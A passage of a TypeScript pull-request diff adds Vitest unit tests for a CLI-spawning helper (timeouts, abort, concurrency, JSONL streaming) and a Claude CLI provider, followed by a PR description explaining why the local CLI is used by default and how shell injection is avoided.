+        child.stdout.emit("data", Buffer.from(assistantLine("ok")));
+        child.emit("close", 0);
+      });
+      return child;
+    });
+
+    expect(await collect(USER_MSG)).toEqual(["ok"]);
+  });
+
+  it("adds --verbose for stream-json output", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => child.emit("close", 0));
+      return child;
+    });
+
+    await collect(USER_MSG);
+
+    const [, args] = spawnMock.mock.calls[0] as [string, string[]];
+    expect(args[args.indexOf("--output-format") + 1]).toBe("stream-json");
+    expect(args).toContain("--verbose");
+  });
+});
+
+// ─── Anthropic SDK guarantee ─────────────────────────────────────────────────
+
+describe("CLI mode — 0 Anthropic API usage", () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  it("never instantiates the Anthropic SDK and needs no ANTHROPIC_API_KEY", async () => {
+    const prevKey = process.env.ANTHROPIC_API_KEY;
+    delete process.env.ANTHROPIC_API_KEY;
+    try {
+      const child = makeChild();
+      spawnMock.mockImplementation(() => {
+        emitAndClose(child, JSON_OK);
+        return child;
+      });
+
+      const provider = new ClaudeCliProvider();
+      const result = await provider.complete("claude-sonnet", USER_MSG);
+
+      expect(result.content).toBe("pong");
+      expect(anthropicCtor).not.toHaveBeenCalled();
+    } finally {
+      if (prevKey !== undefined) process.env.ANTHROPIC_API_KEY = prevKey;
+    }
+  });
+});

--- a/tests/unit/providers/cli-spawn.test.ts
+++ b/tests/unit/providers/cli-spawn.test.ts
@@ -1,0 +1,191 @@
+/**
+ * Unit tests for the shared cli-spawn helper: timeout, AbortSignal cancellation,
+ * concurrency cap, ENOENT handling, and JSONL line streaming.
+ *
+ * `node:child_process` is fully mocked — no real process is launched.
+ */
+import { EventEmitter } from "node:events";
+import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
+
+const spawnMock = vi.fn();
+
+vi.mock("node:child_process", () => ({
+  spawn: (...args: unknown[]) => spawnMock(...args),
+}));
+
+import {
+  spawnCli,
+  streamCliLines,
+  ConcurrencyLimiter,
+  CliNotInstalledError,
+  CliExecutionError,
+} from "../../../server/gateway/providers/cli-spawn.js";
+
+interface FakeChild extends EventEmitter {
+  stdout: EventEmitter;
+  stderr: EventEmitter;
+  stdin: { end: ReturnType<typeof vi.fn> };
+  kill: ReturnType<typeof vi.fn>;
+  killed: boolean;
+}
+
+function makeChild(): FakeChild {
+  const child = new EventEmitter() as FakeChild;
+  child.stdout = new EventEmitter();
+  child.stderr = new EventEmitter();
+  child.killed = false;
+  child.kill = vi.fn(() => {
+    child.killed = true;
+    return true;
+  });
+  child.stdin = { end: vi.fn() };
+  return child;
+}
+
+const REQ = { binary: "claude", args: ["-p"], stdin: "hi" } as const;
+
+describe("spawnCli", () => {
+  beforeEach(() => vi.clearAllMocks());
+  afterEach(() => vi.useRealTimers());
+
+  it("resolves with buffered stdout on a clean exit", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stdout.emit("data", Buffer.from("hello"));
+        child.emit("close", 0);
+      });
+      return child;
+    });
+
+    const result = await spawnCli({ ...REQ });
+    expect(result.stdout).toBe("hello");
+    expect(result.exitCode).toBe(0);
+  });
+
+  it("writes stdin and closes it exactly once", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => child.emit("close", 0));
+      return child;
+    });
+
+    await spawnCli({ ...REQ, stdin: "payload" });
+    expect(child.stdin.end).toHaveBeenCalledWith("payload");
+  });
+
+  it("maps ENOENT to CliNotInstalledError", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() =>
+        child.emit("error", Object.assign(new Error("ENOENT"), { code: "ENOENT" })),
+      );
+      return child;
+    });
+
+    await expect(spawnCli({ ...REQ })).rejects.toBeInstanceOf(CliNotInstalledError);
+  });
+
+  it("rejects with CliExecutionError including stderr on non-zero exit", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stderr.emit("data", Buffer.from("bad input"));
+        child.emit("close", 2);
+      });
+      return child;
+    });
+
+    await expect(spawnCli({ ...REQ })).rejects.toThrow(/bad input|code 2/);
+  });
+
+  it("kills the child and rejects on timeout", async () => {
+    vi.useFakeTimers();
+    const child = makeChild();
+    spawnMock.mockImplementation(() => child); // never emits close
+
+    const promise = spawnCli({ ...REQ, timeoutMs: 1000 });
+    const expectation = expect(promise).rejects.toThrow(/timed out/i);
+    await vi.advanceTimersByTimeAsync(1001);
+    await expectation;
+    expect(child.kill).toHaveBeenCalledWith("SIGTERM");
+  });
+
+  it("kills the child and rejects when the AbortSignal fires", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => child);
+    const controller = new AbortController();
+
+    const promise = spawnCli({ ...REQ, signal: controller.signal });
+    controller.abort();
+
+    await expect(promise).rejects.toThrow(/aborted/i);
+    expect(child.kill).toHaveBeenCalledWith("SIGTERM");
+  });
+});
+
+describe("streamCliLines", () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  it("yields complete lines split on newlines, including a trailing partial", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stdout.emit("data", Buffer.from("a\nb\nc"));
+        child.emit("close", 0);
+      });
+      return child;
+    });
+
+    const lines: string[] = [];
+    for await (const line of streamCliLines({ ...REQ })) lines.push(line);
+    expect(lines).toEqual(["a", "b", "c"]);
+  });
+
+  it("throws CliExecutionError on a non-zero exit after streaming", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stdout.emit("data", Buffer.from("partial\n"));
+        child.stderr.emit("data", Buffer.from("oops"));
+        child.emit("close", 1);
+      });
+      return child;
+    });
+
+    const run = async (): Promise<void> => {
+      for await (const _line of streamCliLines({ ...REQ })) {
+        void _line;
+      }
+    };
+    await expect(run()).rejects.toBeInstanceOf(CliExecutionError);
+  });
+});
+
+describe("ConcurrencyLimiter", () => {
+  it("never runs more than `max` tasks at once", async () => {
+    const limiter = new ConcurrencyLimiter(2);
+    let active = 0;
+    let peak = 0;
+
+    const task = async (): Promise<void> => {
+      active += 1;
+      peak = Math.max(peak, active);
+      await new Promise((r) => setImmediate(r));
+      active -= 1;
+    };
+
+    await Promise.all(Array.from({ length: 6 }, () => limiter.run(task)));
+    expect(peak).toBeLessThanOrEqual(2);
+  });
+
+  it("releases a slot even when a task throws", async () => {
+    const limiter = new ConcurrencyLimiter(1);
+    await expect(
+      limiter.run(async () => {
+        throw new Error("fail");
+      }),
+    ).rejects.toThrow("fail");
+    await expect(limiter.run(async () => "ok")).resolves.toBe("ok");
+  });
+});


### PR DESCRIPTION
Closes #347

## Summary
Runs Claude through the **local `claude` CLI subscription** by default instead of the paid Anthropic API — **0 API-token spend** and no `ANTHROPIC_API_KEY` required in the default mode. The existing `@anthropic-ai/sdk` provider is preserved but **opt-in only**.

## What changed
- **New `ClaudeCliProvider`** (`server/gateway/providers/claude-cli.ts`) implementing `ILLMProvider` (`complete` + `stream`). Invokes `claude -p --output-format json` (and `--output-format stream-json --verbose` for streaming). Flags verified against `claude --help` (v2.1.x).
- **New `cli-spawn` helper** (`server/gateway/providers/cli-spawn.ts`): spawns with an **argument array** (never a shell string), feeds the prompt via **stdin** (command-injection safe), enforces a per-process **timeout**, honours an **AbortSignal**, applies a **concurrency cap**, and raises a typed `CliNotInstalledError` on `ENOENT`. Kept small/self-contained.
- **`providers.anthropic.mode`** config enum (`"cli"` default | `"api"`). The paid SDK path (`ClaudeProvider`) is constructed **only** when `mode === "api"` AND an `apiKey` is present.
- **Gateway wiring** (`server/gateway/index.ts`): `registerAnthropic()` registers the CLI provider under the `"anthropic"` key by default; removing an API key falls back to CLI rather than deleting the provider.

## Guarantees
- In CLI (default) mode the **Anthropic SDK is never instantiated** and `ANTHROPIC_API_KEY` is not read → **0 calls to api.anthropic.com**. Asserted by tests.
- Message content can never be shell-interpolated (stdin-only); asserted with a malicious-payload test.

## Tests (`npx vitest run --project unit`)
- `child_process` mocked. Assertions: SDK not constructed in CLI mode; exact safe command+args (no injection); JSON/JSONL parsing incl. malformed output; CLI-missing (`ENOENT`) error path; timeout/abort/concurrency in the spawn helper.
- 46/46 tests pass across touched files. New-code line coverage ~98% (`claude-cli.ts`) and ~91% (`cli-spawn.ts`).
- `tsc` is clean for all new/changed files (the repo's pre-existing `ioredis`/`bullmq` module-not-found errors are unrelated and present on `main`).

## Conflict awareness
`server/gateway/index.ts` is a **shared file also edited by #348 (Antigravity CLI)**. The `cli-spawn.ts` helper was kept small and self-contained specifically so #348 can reuse it after merge.